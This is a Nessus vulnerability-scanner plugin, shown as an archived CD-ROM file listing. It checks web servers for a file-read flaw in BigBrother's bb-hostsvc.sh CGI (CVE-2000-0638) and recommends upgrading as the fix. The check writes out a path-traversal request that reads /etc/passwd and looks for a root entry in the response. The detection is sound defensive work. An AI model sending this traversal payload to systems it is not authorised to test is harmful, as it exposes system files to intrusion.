home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / bb-hostsvc.nasl < prev    next >
Text File  |  2005-01-14  |  2KB  |  71 lines
  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  4. #
  5. # See the Nessus Scripts License for details
  6. #
  7.  
  8. if(description)
  9. {
  10.  script_id(10460);
  11.  script_bugtraq_id(1455);
  12.  script_version ("$Revision: 1.18 $");
  13.  script_cve_id("CVE-2000-0638");
  14.  script_name(english:"bb-hostsvc.sh");
  15.  
  16.  script_description(
  17.      english:"It is possible to view arbitrary files on a system where versions 
  18. 1.4h or older of 'BigBrother' are installed, using a flaw in the bb-hostsvc.sh CGI
  19. program.
  20.  
  21. Solution : Upgrade to version 1.4i or later.
  22.  
  23. Risk factor : High",
  24.  
  25.     francais:"Il est possible de lire des fichiers arbitraires sur
  26. un systΦme sur lequel la version 1.4h ou plus ancienne de  'BigBrother' sont
  27. installΘes, en utilisant un problΦme dans le programme cgi 'bb-hostsvc.sh'.
  28.  
  29. Solution: Upgradez α la version 1.4i ou plus rΘcente.
  30.  
  31. Facteur de risque : ElevΘ");
  32.  
  33.  script_summary(english:"Read arbitrary files using the CGI bb-hostsvc.sh",
  34.          francais:"Lit des fichiers arbitraires en utilisant le CGI bb-hostsvc.sh");
  35.  
  36.  script_family(english:"CGI abuses", francais:"Abus de CGI");
  37.   
  38.  script_category(ACT_GATHER_INFO);
  39.  script_dependencie("find_service.nes", "http_version.nasl");
  40.  script_require_ports("Services/www", 80);
  41.  script_copyright("Copyright (C) 1999 Renaud Deraison"); 
  42.  exit(0);
  43. }
  44.  
  45. #
  46. # The script code starts here
  47. #
  48.  
  49. include("http_func.inc");
  50. include("http_keepalive.inc");
  51.  
  52.  
  53. port = get_http_port(default:80);
  54.  
  55. if(!get_port_state(port))exit(0);
  56.  
  57. foreach dir (cgi_dirs())
  58. {
  59.  command = string(dir, "/bb-hostsvc.sh?HOSTSVC=../../../../../etc/passwd");
  60.  req = http_get(item:command, port:port);
  61.  flaw = 0;
  62.  buffer = http_keepalive_send_recv(port:port, data:req);
  63.  if( buffer == NULL ) exit(0);
  64.  if(egrep(pattern:"root:.*:0:[01]", string:buffer))
  65.  {  
  66.   security_hole(port);
  67.   exit(0);
  68.  }
  69. }
  70.  
  71.